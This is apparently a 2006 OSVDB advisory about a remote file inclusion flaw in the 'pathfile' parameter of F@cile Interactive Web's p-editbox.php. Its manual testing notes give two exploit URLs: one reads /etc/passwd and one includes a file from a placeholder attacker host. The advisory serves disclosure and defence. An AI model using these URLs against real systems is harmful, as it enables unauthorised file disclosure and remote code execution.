F@cile Interactive Web p-editbox.php pathfile Variable Remote File Inclusion

2006-05-27T11:04:47
ID OSVDB:26102
Type osvdb
Reporter Mustafa Can Bjorn(nukedx@nukedx.com)
Modified 2006-05-27T11:04:47

Description

Vulnerability Description

F@cile Interactive Web contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to p-editbox.php script not properly sanitizing user input supplied to the \'pathfile\' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script or disclose the contents of arbitrary files on the system.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to \'on\'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

F@cile Interactive Web contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to p-editbox.php script not properly sanitizing user input supplied to the \'pathfile\' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script or disclose the contents of arbitrary files on the system.

Manual Testing Notes

http://[target]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd http://[target]/[FacilePath]/p-editbox.php?pathfile=\\[attacker]\file.php

References:

Vendor URL: http://www.facile-web.it/ Secunia Advisory ID:20358 Related OSVDB ID: 26100 Related OSVDB ID: 26104 Related OSVDB ID: 26101 Related OSVDB ID: 26103 Other Advisory URL: http://www.nukedx.com/?viewdoc=35 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0639.html FrSIRT Advisory: ADV-2006-2036 CVE-2006-2745 Bugtraq ID: 18149